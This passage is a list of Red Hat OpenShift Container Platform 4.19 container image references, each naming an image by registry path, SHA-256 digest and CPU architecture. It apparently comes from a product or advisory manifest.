"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
